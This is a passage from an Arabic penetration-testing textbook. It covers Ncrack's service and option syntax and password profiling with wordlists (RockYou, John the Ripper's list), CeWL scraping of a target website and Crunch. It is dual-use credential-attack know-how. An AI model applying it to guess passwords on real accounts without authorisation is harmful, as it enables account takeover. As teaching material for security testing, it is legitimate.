‫اﻟﻣﻧﻔذ ﺣﺎﻟﺔ ﺧﺎﺻﺔ ﺣﯾث ﺗﻌﻠﻣون أن ﯾﻣﻛن ﺟﻌل ﺧدﻣﺔ ﻣﻌﯾﻧﺔ ﺗﺳﺗﺧدم ﻣﻧﻔذ ﻏﯾر اﻟﻣﻧﻔذ اﻻﻓﺗراﺿﻲ ﻟﮭﺎ‪.‬‬
‫ﯾﻘدم ‪ Ncrack‬طرﯾﻘﺗﺎن ﻣﺗﻣﯾزﺗﺎ واﻟﺗﻲ ﺳﯾﺗم ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﺧدﻣﺎت اﻟﮭدف وھﻣﺎ‪:‬‬
‫‪per-host service specification -1‬‬
‫‪global specification -2‬‬
‫‪Per-host service specification‬‬
‫ﯾﺗم ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻓﻲ ھذا اﻟوﺿﻊ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻟﺧدﻣﺔ ﺑﺟﺎﻧب اﻟﻣﺿﯾف اﻟﮭدف ﺣﯾث ﺗﻛون ﻣﺣدده ﻟﮭذا اﻟﻣﺿﯾف وﺗﻧطﺑﻖ ﻋﻠﯾﮫ ﻓﻘط‪ .‬وﻟﻛن‬
‫ﯾﺟب ان ﻧﺄﺧذ ﻓﻲ اﻻﻋﺗﺑﺎر‪ ،‬أﻧﮫ ﻋﻧد ﺗﺣدﯾد اﻟﮭدف ﻓﺎﻧﮫ ﯾﺳﻣﺢ ﺑﺎﺳﺗﺧدام ‪) wildcards‬اﻟرﻣوز( و‪ netmask‬وھذا ﯾﻌﻧﻲ أﻧﮫ ﻋﻧد ﺗطﺑﯾﻖ ﺻﯾﻐﺔ‬
‫ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻟﻛل ﻣﺿﯾف ﻋﻠﻰ ھذا ﻓﺎﻧﮫ ﺳوف ﯾﺷﻣل اﻟﺟﻣﯾﻊ‪ .‬اﻟﺷﻛل اﻟﻌﺎم ﻛﺎﻻﺗﻰ‪:‬‬
‫>]‪<[service-name]>://<target>:<[port-number‬‬
‫ﻣﺛﺎل ﻋﻠﻰ ذﻟك ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Global service specification‬‬


‫ﯾﺗم ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻓﻲ ھذا اﻟوﺿﻊ ﻟﺟﻣﯾﻊ اﻷﺟﮭزة اﻟﻣﺿﯾﻔﺔ اﻟﺗﻲ ﻟم ﺗﺗراﻓﻖ ﻣﻊ ﺗﻧﺳﯾﻖ اﻟﺧدﻣﺔ ﻟﻛل اﻟﻣﺿﯾف‪. Per-host service specification‬‬
‫وﯾﺗم ذﻟك ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎر)‪ .(-P‬ﯾﻣﻛن ﺗﺣدﯾد أﻛﺛر ﻣن ﺧدﻣﮫ ﺑﺎﺳﺗﺧدام اﻟﻔﺎﺻﻠﺔ ﻟﻠﻔﺻل ﺑﯾﻧﮭم‪ .‬اﻟﺷﻛل اﻟﻌﺎم ﻛﺎﻻﺗﻰ‪:‬‬
‫‪-p <[service1]>:<[port-number1]>,<[service2]>:<[port-number2]>,...‬‬
‫ﻣﺛﺎل ﻋﻠﻰ ذﻟك ﻛﺎﻻﺗﻰ‪:‬‬

‫ﺑﺻرف اﻟﻧظر ﻋن ﺗﺣدﯾد اﻟﺧدﻣﺎت اﻟﻌﺎﻣﺔ‪ Ncrack ،‬ﯾﺳﻣﺢ ﻟك ﺑﺗوﻓﯾر اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﻟﺗﻲ ﯾﻣﻛن ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﻛل أو ﻣﺟﻣوﻋﺔ ﻓرﻋﯾﺔ‬
‫ﻣن اﻷھداف اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﺗﺷﻣل اﻟﺧﯾﺎرات اﻟﺗوﻗﯾت واﻷداء‪ SSL ،‬ﺗﻣﻛﯾن ‪ /‬ﺗﻌطﯾل‪ ،‬وﻏﯾرھﺎ ﻣن ﻣﻌﺎﻣﻼت اﻟوﺣدة اﻟﻣﺣددة‬
‫)‪ (module-specific parameters‬ﻣﺛل ﻣﺳﺎر ‪ URL‬اﻟﻧﺳﺑﻲ ﻟﻠوﺣدة ‪ .HTTP‬ﯾﻣﻛن ﺗﻌرﯾف اﻟﺧﯾﺎرات ﻓﻲ ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟطرق‬
‫اﻟﺗﻲ ﺗﺷﻣل‪:‬‬
‫‪Per-host options, per-module options and global options‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪374‬‬

‫وﯾﻣﻛن اﺳﺗﺧدام ﻣزﯾﺞ ﻣن ھذه اﻟﺧﯾﺎرات‪.‬‬


‫‪Per-host options -1‬‬
‫ﺗﺷﻣل اﻟﺧﯾﺎرات اﻟﺗﻲ ﯾﺗم ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﻣﺿﯾف ﻓﻘط واﻟﺗﻲ ﺗﻛﺗب ﺑﺟواره‪ .‬اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪< [service-name]> ://< target> :< [port-number]>, <opt1>=<optval1>, <opt2>=<optval2>,...‬‬
‫‪per-module options -2‬‬
‫ﺗﺷﻣل اﻟﺧﯾﺎرات اﻟﺗﻲ ﯾﺗم ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﻣﺿﯾف اﻟﻣرطﺑﯾﺗﯾن ﻓﻘط ﺑوﺣدة او ﺧدﻣﮫ ﻣﻌﯾﻧﮫ وﯾﺗم ھذا ﺑﺎﺳﺗﺧدام )‪ .(-m‬اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪-m <service-name> :< opt1>=<optval1>, <opt2>=<optval2>,...‬‬
‫‪global options -3‬‬
‫ﺗﺷﻣل اﻟﺧﯾﺎرات اﻟﺗﻲ ﯾﺗم ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﻣﺿﯾف ﺑﻐض اﻟﻧظر ﻋن اﻟﺧدﻣﺔ اﻟﻣرﺗﺑط ﺑﮭﺎ‪ .‬اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪-g <opt1>=<optval1>, <opt2>=<optval2>,...‬‬
‫ﻓﯾﻣﺎ ﯾﻠﻲ ﻗﺎﺋﻣﮫ ﺑﺎﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻟﻠﺧدﻣﺎت ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Output‬‬
‫ﺣﯾث ﻣن ﺧﻼﻟﮭﺎ ﯾﻣﻛن ﺗﺣدﯾد ﻛﯾﻔﯾﺔ اﺧراج وﺗﺧزﯾن ﻧﺎﺗﺞ اﻻﻣر ‪ Ncrack‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻟﺻﯾﻎ اﻟﻌﺎﻣﺔ واﻟﺗﻲ ﺗوﺿﺢ طرﯾﻘﺔ ﺣﻔظ ﻧﺎﺗﺞ اﻻﻣر‪.‬‬
‫)‪-oN <filespec> (normal output‬‬
‫)‪-oX <filespec> (XML output‬‬
‫)‪-oA <basename> (Output to all formats‬‬
‫ﯾﻣﻛن اﻻطﻼع ﻋﻠﻰ اﻟﻛﺛﯾر ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن ھذه اﻷداة ﻣن ﺧﻼل زﯾﺎرة اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://nmap.org/ncrack/man.html‬‬
‫ﯾﻣﻛن أﯾﺿﺎ اﻻطﻼع ﻋﻠﻰ اﻟﻛﺛﯾر ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول ﻛﯾﻔﯾﺔ اﻧﺷﺎء‪/‬إﺿﺎﻓﺔ ﺑروﺗوﻛوﻻت ووﺣدات ﻏﯾر اﻟﻣدرﺟﺔ ﻓﻲ ھذه اﻷداة ﻣن ﺧﻼل زﯾﺎرة‬
‫اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ )ھذا ﺧﺎص ﺑﺎﻟﻣطورﯾن(‪:‬‬
‫‪http://nmap.org/ncrack/devguide.html‬‬

‫)‪Password Profiling (Word list or Dictionary file‬‬

‫واﺣدة ﻣن اﻟﻣﺗطﻠﺑﺎت اﻟﻣذﻛورة أﻋﻼه ھﻲ ﻗﺎﺋﻣﺔ اﻟﻘﺎﻣوس)‪ (Dictionary list‬واﻟﺗﻲ ﯾطﻠﻖ ﻋﻠﯾﮭﺎ ﻋدة أﺳﻣﺎء أﺧرى ﻣﺛل ‪ World List‬او‬
‫‪ ،Password Profiling‬وﻟﻛن ﻓﻲ اﻟﻧﮭﺎﯾﺔ ﺗﺷﯾر ﺟﻣﯾﻌﮭﺎ اﻟﻰ ﻣﻌﻧﻰ واﺣد وھو ﻋﻣﻠﯾﺔ ﺑﻧﺎء ﻗﺎﺋﻣﺔ ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧﺻﺻﺔ اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ‬
‫ﻟﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﺳر ﻟﻛﯾﺎن ﻣﺣدد او ﺑﻣﻌﻧﻰ اﺧر ھو اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺣﺗﻣﻠﺔ‪ .‬وﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺷﺎر إﻟﯾﮭﺎ ﺑﺎﺳم ھذه‬
‫اﻟﻘواﺋم اﻟﻘواﻣﯾس ﻷﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ اﻵﻻف أو ﺣﺗﻰ اﻟﻣﻼﯾﯾن ﻣن اﻟﻛﻠﻣﺎت اﻟﻔردﯾﺔ‪.‬‬
‫ﻣﻌظم اﻟﻧﺎس ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﺳﺗﺧدم اﻟﻛﻠﻣﺎت اﻻﻧﺟﻠﯾزﯾﺔ اﻟﻌﺎدﯾﺔ أو ﻣﻊ ﺑﻌض اﻻﺧﺗﻼف اﻟﺻﻐﯾرة ﻣﺛل ‪ 1‬ﻋﻠﻰ اﻧﮫ ﺣرف ‪ i‬أو ‪ 5‬ﻋﻠﻰ اﻧﮫ ﺣرف‪ s‬او ﻗد‬
‫ﯾﺳﺗﺧدﻣوا ﺑﻌض اﻟﻛﻠﻣﺎت اﻟﻣﻌﺑرة ﻋن ﺣﯾﺎﺗﮭم اﻟﺷﺧﺻﯾﺔ ﻋﻧدﻣﺎ ﯾﻘوﻣوا ﺑﺈﻧﺷﺎء ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎن ‪ Bob‬ﯾﺣب ﻛﻠﺑﮫ‬
‫‪ Barfy‬أﻛﺛر ﻣن أي ﺷﻲء ﻓﻲ اﻟﻌﺎﻟم‪ ،‬وﻧﺗﯾﺟﺔ ﻟذﻟك ﻓﺄﻧﻰ ﻣﺗﺄﻛد ان ﻛﻠﻣﺔ اﻟﻣرور ﺳوف ﺗﻛون اﻣﺎ ‪ Barfy‬او ‪ dog‬او ﻏﯾرھﺎ ﻣن اﻟﻛﻠﻣﺎت ذات‬
‫اﻟﺻﻠﺔ ﺑﺎﻟﻛﻼب ذات اﻟﺻﻠﺔ واﻟﺗﻲ ﺳوف ﺗﻛون ﻣوﺟودة ﻓﻲ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﻲ‪ .‬ﻗواﺋم ﻛﻠﻣﺔ اﻟﺳر ھﻲ ﻣﺣﺎوﻟﺔ ﻟﺟﻣﻊ أﻛﺑر ﻋدد‬
‫ﻣﻣﻛن ﻣن ھذه اﻟﻛﻠﻣﺎت اﻟﻣﻣﻛﻧﺔ‪ .‬ﺑﻌض اﻟﻣﺗﺳﻠﻠﯾن وﻣﺧﺗﺑري اﻻﺧﺗراق ﯾﻘﺿون ﺳﻧوات ﻟﺑﻧﺎء ﻗواﻣﯾس ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﻗد ﺗﺻل ﺣﺟﻣﮭﺎ إﻟﻰ‬
‫ﺟﯾﺟﺎ ﺑﺎﯾت وﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻼﯾﯾن أو ﺣﺗﻰ اﻟﻣﻠﯾﺎرات ﻣن ﻛﻠﻣﺎت اﻟﺳر‪ .‬اﻟﻘﺎﻣوس اﻟﺟﯾد ﯾﻣﻛن أن ﯾﻛون ﻣﻔﯾد ﻟﻠﻐﺎﯾﺔ وﻟﻛن ﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺗطﻠب اﻟﻛﺛﯾر‬
‫ﻣن اﻟوﻗت واﻻھﺗﻣﺎم ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﻧظﺎﻓﺔ‪ .‬اﻟﻘواﻣﯾس ﻧظﯾﻔﺔ وﻣﺑﺳطﺔ وﺧﺎﻟﯾﺔ ﻣن اﻻزدواﺟﯾﺔ‪.‬‬
‫ﻣﻌظم ﺑراﻣﺞ ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور ﯾﻣﻛﻧﮭم اﺳﺗﺧدام ﻣﻠف ﻛﻠﻣﺔ اﻟﻣرور ﻣﺑﺎﺷرة ﻷﻧﮭﺎ ﻣوﺟودة‪ ،‬ﻓﻲ ﺣﯾن أن أﻛﺛر اﻟدول اﻟﻣﺗﻘدﻣﺔ ﯾﻣﻛن اﺳﺗﺧدام‬
‫ﻣﻠف ﻛﻠﻣﺔ اﻟﺳر )أو ﻣﻠﻔﺎت ﻣﺗﻌددة( واﻟﺗﻼﻋب ﺑﮭﺎ ﻟﻣﺣﺎوﻟﺔ ﺧﻠﻖ اﻟﻌدﯾد ﻣن اﻟﺗرﻛﯾﺑﺎت اﻟﺟدﯾدة ﻣن ﻛﻠﻣﺎت اﻟﺳر‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪375‬‬

‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﯾﻣﻛن ﻟﺑﻌض اﻟﺗطﺑﯾﻘﺎت اﺗﺧﺎذ ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣوﺟود ﻓﻲ ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت وإرﻓﺎق ﺑﻌض اﻷﺣرف أو اﻷرﻗﺎم إﻟﻰ ﺑداﯾﺔ أو‬
‫ﻧﮭﺎﯾﺔ اﻟﻛﻠﻣﺔ‪ .‬وﺑﻌض اﻟﺑراﻣﺞ اﻷﺧرى ﺗﺗﻌﺎﻣل ﻣﻊ اﺛﻧﯾن أو أﻛﺛر ﻣن اﻟﻣﻠﻔﺎت ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت ﻓﻲ أﻧن واﺣد واﻟﺟﻣﻊ ﺑﯾن اﻟﻛﻠﻣﺎت ﻟﻣﺣﺎوﻟﺔ ﺗﻘدﯾم‬
‫ﻗﺎﺋﻣﺔ ﺟدﯾدة ﻣن اﻟﻛﻠﻣﺎت‪.‬‬
‫اﺳﺗﺧدام ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت ﯾﺟﻌل ﻣن ﻋﻣﻠﯾﺔ ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور ﻋﻣﻠﯾﮫ ﺳﮭﻠﮫ وﺳرﯾﻌﺔ‪ .‬ﻓﺈن اﻟﻌدﯾد ﻣن ﻣﺧﺗﺑري اﻻﺧﺗراق ﯾﻘوﻣوا ﺑﺈﻧﺷﺎء اﻟﻌدﯾد‬
‫ﻣن ﻗواﺋم ﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﺑﺎﺳﺗﺧدام ﺑﯾﺎﻧﺎت اﻟﺷرﻛﺔ‪ ،‬وأﺳﻣﺎء اﻟﻣوظﻔﯾن وأرﻗﺎم اﻟﮭﺎﺗف وﻋﻧﺎوﯾن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬إﻟﺦ‪.‬‬

‫ھﻧﺎك اﻟﻛﺛﯾر ﻣن ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﺻﻐﯾرة اﻟﺗﻲ ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻣن ﻋﻠﻰ اﻹﻧﺗرﻧت وﺗﻛون ﺑﻣﺛﺎﺑﺔ ﻧﻘطﺔ اﻧطﻼق ﺟﯾدة ﻟﺑﻧﺎء ﻗﺎﻣوس ﻛﻠﻣﺔ اﻟﺳر‬
‫اﻟﺷﺧﺻﯾﺔ اﻟﺧﺎﺻﺔ ﺑك‪ .‬وھﻧﺎك أﯾﺿﺎ اﻷدوات اﻟﻣﺗﺎﺣﺔ اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ ﺑﻧﺎء ﻗواﺋم اﻟﻘواﻣﯾس ﺑﺎﻟﻧﺳﺑﺔ ﻟك‪ .‬وﻟﻛن‪ ،‬ﻟﺣﺳن اﻟﺣظ‪ ،‬ﻓﺎن ﻧظﺎم اﻟﺗﺷﻐﯾل‬
‫ﻛﺎﻟﻲ ﺑﺎﻟﻔﻌل ﯾﺣﺗوي ﻋﻠﻰ ﻋدد ﻗﻠﯾل ﻣن ﻗواﺋم اﻟﻛﻠﻣﺎت ﺑﺎﻟﻧﺳﺑﺔ ﻟﻧﺎ ﻻﺳﺗﺧداﻣﮭﺎ‪ .‬ﯾﻣﻛﻧك اﻟﻌﺛور ﻋﻠﻰ ھذه ﻓﻲ اﻟﻣﺳﺎر ]‪[/usr/share/wordlists‬‬
‫اﻟذي ﯾﺣﺗوي ﻋﻠﻰ واﺣد ﻣن أﻋﺗﻰ ﻗواﺋم اﻟﻛﻠﻣﺎت واﻟذي ﯾﺳﻣﻰ "‪) "RockYou‬ﻣﺄﺧوذ ﻣن ﺧرق اﻟﺑﯾﺎﻧﺎت اﻟﻛﺑﯾرة ﻟﻠﻐﺎﯾﺔ(‪.‬‬

‫ھﻧﺎك أﯾﺿﺎ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺎت ﺻﻐﯾرة وﻟﻛﻧﮭﺎ ﻣﻔﯾدة ﺟدا ﻣﺗﺿﻣﻧﮫ ﻣﻊ )‪ (JtR‬واﻟﺗﻲ ﺗﻘﻊ ﻓﻲ اﻟﻣﺳﺎر ]‪.[/usr/share/john/password.lst‬‬
‫ھﻧﺎك ﻗواﺋم أﺧرى واﻟﺗﻲ ﺗﺳﻣﻰ ‪ WFUZZ Multiple Wordlists‬واﻟﺗﻲ ﺗوﺟد ﻓﻲ اﻟﻣﺳﺎر ‪./usr/share/wfuzz/‬‬

‫ﻋﻧدﻣﺎ ﯾﺗﻌﻠﻖ اﻷﻣر ﺑﻘواﺋم ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﺎن اﻷﻛﺑر ﻣﻧﮭﺎ ﻟﯾس داﺋﻣﺎ اﻷﻓﺿل‪ .‬أدوات ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟوﺿﻊ ‪ Offline‬ﻣﺛل ‪JtR‬‬
‫ﺗﻌﺎﻟﺞ اﻟﻣﻼﯾﯾن ﻣن ﻛﻠﻣﺎت اﻟﺳر ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻻت‪ ،‬ﻓﺎن ﻛﻠﻣﺎ ﻛﺎﻧت ﻗواﺋم ﻛﻠﻣﺎت اﻟﺳر أﻛﺑر ﻛﻠﻣﺎ ﻛﺎن ﺟﯾدا‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺎن‬
‫ﺗﻘﻧﯾﺎت ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور أﺧرى ﻣﺛل اﻟﻣﯾدوﺳﺎ واﻟﮭﯾدرا ﻗد ﺗﻛون ﻗﺎدرة ﻋﻠﻰ ﻣﻌﺎﻟﺟﺔ واﺣد أو اﺛﻧﯾن ﻣن ﻛﻠﻣﺎت اﻟﺳر ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة ﻓﻘط‪.‬‬
‫ﻓﻲ ھذه اﻟﺣﺎﻻت‪ ،‬ﻓﺎن وﺟود ﻗﺎﺋﻣﺔ واﺣدة ﻣﻊ اﻟﻣﻠﯾﺎرات ﻣن ﻛﻠﻣﺎت اﻟﻣرور ﻏﯾر ﻋﻣﻠﻲ ﻷﻧك ﺑﺑﺳﺎطﺔ ﻟن ﯾﻛون ﻟدﯾك اﻟوﻗت ﻟﻠﺣﺻول ﻋﻠﻰ‬
‫ﻛﻠﻣﺎت اﻟﻣرور ﻣن ﺧﻼل اﻟﻘﺎﺋﻣﺔ ﺑﺄﻛﻣﻠﮭﺎ‪ .‬ﻓﻲ ﻣﺛل ھذه اﻟﺣﺎﻻت‪ ،‬ﻓﺎﻧﮫ ﻣن اﻷﻓﺿل اﺳﺗﺧدام ﻗﺎﻣوس أﺻﻐر‪ ،‬واﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور‬
‫اﻷﻛﺛر ﺷﻌﺑﯾﺔ‪.‬‬
‫ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﯾﺗوﻓر اﻟﻌدﯾد ﻣن اﻷدوات واﻟﺗﻲ ﺗﻣﻛﻧك ﻣن إﻧﺷﺎء ‪ wordlists‬ﺷﺧﺻﯾﺔ ﺧﺎﺻﺔ ﺑك‪ .‬ﻣن ھذه اﻻدوات ‪ CeWL‬ھو‬
‫أﻧﯾﻖ ﺟدا ﻷﻧﮫ ﯾﺗﯾﺢ ﻟك إﻧﺷﺎء ﻛﻠﻣﺎت اﻟﻣرور ﻋن طرﯾﻖ اﻻﺳﺗﯾﻼء ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﻣن ﻣوﻗﻊ اﻟﮭدف‪ Crunch .‬ھو اداه ﻟطﯾﻔﮫ ﺟدا ﺗﺳﻣﺢ ﻟك‬
‫ﻟﺧﻠﻖ ‪ wordlists‬اﻟﻣﺧﺻﺻﺔ اﻟﺧﺎﺻﺔ ﺑك ﻣن اﻟﺻﻔر‪.‬‬

‫)‪CeWL (Password Profiling‬‬


‫‪ CeWL‬ھو ﺗطﺑﯾﻖ ﻗﺎﺋم ﻋﻠﻰ ﻟﻐﺔ اﻟﺑرﻣﺟﺔ ‪ Ruby‬واﻟﺗﻲ ﺗﻘوم ﺑﺎﻟﻧظر اﻟﻰ ﻋﻧﺎوﯾن ‪ URL‬ﺑﻌﻣﻖ ﻣﺛل ﻣﺎ ﺗﻘوم ﺑﮫ ﻣواﻗﻊ اﻟﺑﺣث‪ ،‬وﯾﻣﻛﻧﮭﺎ أﯾﺿﺎ‬
‫ﺗﺗﺑﻊ اﻟﻌﻧﺎوﯾن اﻟﺧﺎرﺟﯾﺔ اﻟﻣرﺗﺑطﺔ ﺑﺎﻟﻣوﻗﻊ اﻟﮭدف اﺧﺗﯾﺎرﯾﺎ أي ﻋﻠﻰ ﺣﺳب اﻟرﻏﺑﺔ‪ ،‬ﺛم ﺑﻌد ذﻟك ﯾﻘوم ﺑﺈرﺟﺎع ﻗﺎﺋﻣﺔ ﻣن اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﯾﻣﻛن‬
‫اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﺗطﺑﯾﻘﺎت اﻷﺧرى ﻓﻲ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻣﺛل ‪ .JtR‬ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول ‪ ،CeWL‬ﯾﻣﻛن زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬

‫‪http://www.digininja.org/projects/cewl.php‬‬

‫دﻋﻧﺎ ﻧﻧظر أوﻻ إﻟﻰ ﻣﻌﻠوﻣﺎت اﻻﺳﺗﺧدام اﻟﺗﻲ ﺗﻘدﻣﮭﺎ ‪ ،CeWL‬وﺑﻌد ذﻟك ﺳوف ﻧظﮭر ﻟك ﻛﯾﻔﯾﺔ اﺳﺗﺧداﻣﮫ‪ .‬وﯾﺗم ذﻟك ﻋن طرﯾﻖ اﺗﺑﺎع اﻻﺗﻲ‪:‬‬

‫‪Applications | Kali Linux | Password Attacks | Online Attacks | CeWL‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪376‬‬

‫اﻓﺗراﺿﯾﺎ‪ CeWL ،‬ﺗﻘوم ﺑﺟﻣﻊ اﻟﻛﻠﻣﺎت ذات ‪ 3‬أﺣرف أو أﻛﺛر ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟذي ﺣددﺗﮫ وﺳوف ﺗذھب إﻟﻰ ﻋﻣﻖ ﻣﺳﺗوﯾن ﻣن اﻟوﺻﻼت‬
‫اﻟﺧﺎرﺟﯾﺔ ﺑﺎﺳﺗﺧدام أﺳﻠوب اﻟﻌﻧﻛﺑوت )ﻣﺛل اﻟذي ﺗﺳﺗﺧدﻣﮫ ﻣواﻗﻊ اﻟﺑﺣث ﻣﺛل ﺟوﺟل ﻓﻲ ﻋﻣﻠﯾﺎت اﻟﺑﺣث(‪ ،‬وﯾﻣﻛن ﺗﻐﯾﯾر ھذا اﻟﺳﻠوك ﻋن طرﯾﻖ‬
‫ﺗﻣرﯾر اﻟﻣﻌﺎﻣﻼت‪ .‬ﻛن ﺣذرا ﻋﻧد ﺗﻐﯾر ھده اﻟﻣﻌﺎﻣﻼت ﺣﯾث إذا وﺿﻌﺗﮭم اﻟﻰ ﻋﻣﻖ ﻛﺑﯾر واﻟﺳﻣﺎح ﻟﮫ ﺑﺎﻟذھﺎب ﺑﻌﯾدا‪ ،‬ﻓﻘد ﯾﻧﺗﮭﻲ ﺑك اﻟﻣطﺎف اﻟﻰ‬
‫اﻻﻧﺟراف إﻟﻰ اﻟﻛﺛﯾر ﻣن اﻟﻣﺟﺎﻻت اﻷﺧرى‪ .‬ﺟﻣﯾﻊ اﻟﻛﻠﻣﺎت ذات اﻟﺛﻼﺛﺔ أﺣرف وأﻛﺛر ﺗﻛون ﻧﺎﺗﺞ اﻹﺧراج‪ .‬ﯾﻣﻛن زﯾﺎدة طول اﻟﻛﻠﻣﺔ وﯾﻣﻛن‬
‫أﯾﺿﺎ ﻛﺗﺎﺑﺔ اﻟﻛﻠﻣﺎت إﻟﻰ ﻣﻠف ﺑدﻻ ﻣن اﻟﺷﺎﺷﺔ‪.‬‬
‫‪#cewl [OPTION] ... URL‬‬
‫‪#cewl -w passwords.txt http://www.digininja.org/projects/cewl.php‬‬

‫‪Crunch‬‬
‫‪ Crunch‬ھﻲ أداة ﻗوﯾﮫ ﺗﺳﺗﺧدم ﻹﻧﺷﺎء ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﺧﺎﺻﺔ ﺑك واﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣﻊ ﺗطﺑﯾﻘﺎت ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫ﻟﻠوﺻول اﻟﻰ ﺻﻔﺣﺎت اﻟﻣﺳﺎﻋدة اﻟﺧﺎﺻﺔ ب ‪ ،Crunch‬وذﻟك ﻋن طرﯾﻖ اﺳﺗﺧدام اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#man crunch‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪377‬‬

‫ﻓﻲ اﻷﺳﺎس ﻛل ﻣﺎ ﻧﺣﺗﺎج إﻟﯾﮫ ﻟﺗﺷﻐﯾل‪ Crunch‬ھو ﺗﺣدﯾد اﻟﺣد اﻷدﻧﻰ واﻟﺣد اﻷﻗﺻﻰ ﻟﻠطول وﻧوع اﻷﺣرف اﻟﻣﺳﺗﺧدﻣﺔ‪ .‬أﯾﺿﺎ ‪crunch‬‬
